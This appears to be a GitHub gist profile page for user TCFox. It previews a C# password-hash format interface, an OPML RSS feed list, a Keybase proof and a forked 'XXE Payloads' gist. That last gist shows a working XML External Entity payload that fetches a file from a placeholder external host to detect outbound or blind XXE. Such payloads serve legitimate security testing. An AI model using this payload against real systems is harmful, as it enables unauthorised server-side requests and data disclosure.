Skip to content

Instantly share code, notes, and snippets.

View TCFox's full-sized avatar
🦊
Fox.

TC Foxtaur TCFox

🦊
Fox.
View GitHub Profile
@TCFox
TCFox / XXE_payloads
Created March 3, 2021 02:28 — forked from staaldraad/XXE_payloads
XXE Payloads
--------------------------------------------------------------
Vanilla, used to verify outbound xxe or blind xxe
--------------------------------------------------------------
<?xml version="1.0" ?>
<!DOCTYPE r [
<!ELEMENT r ANY >
<!ENTITY sp SYSTEM "http://x.x.x.x:443/test.txt">
]>
<r>&sp;</r>
@TCFox
TCFox / IPasswordHashStringFormatService.cs
Created October 13, 2018 09:59
Bad attempt at implementing P-H-C's string format
using System.Collections.Generic;
namespace PHC.StringFormat
{
public interface IPasswordHashStringFormatService
{
string GetHashString(string id, byte[] hash, byte[] salt = null, IDictionary<string, string> parameters = null);
string GetHashType(string hashString);
byte[] GetHashValue(string hashString);
byte[] GetHashSalt(string hashString);
@TCFox
TCFox / rss.opml
Last active August 25, 2016 03:43
TC's RSS Feeds
<?xml version="1.0"?>
<opml version="1.0">
<head>
<title>TCFox's RSS Feeds</title>
<dateCreated>Wed, 15 Jun 2016 15:46:04 +1200</dateCreated>
<dateModified>Thu, 25 Aug 2016 15:36:10 +1200</dateModified>
</head>
<body>
<outline text="leastprivilege.com" type="rss" xmlUrl="http://leastprivilege.com/feed/"/>
<outline text="Google Online Security Blog" type="rss" xmlUrl="http://feeds.feedburner.com/GoogleOnlineSecurityBlog"/>
@TCFox
TCFox / keybase.md
Last active October 8, 2016 03:48
keybase.md

Keybase proof

I hereby claim:

  • I am tcfox on github.
  • I am tcfox (https://keybase.io/tcfox) on keybase.
  • I have a public key ASCCmnLeXMQD8vJltHBoZumLFuRZc4q4H802IR2FO7ISLQo

To claim this, I am signing this object: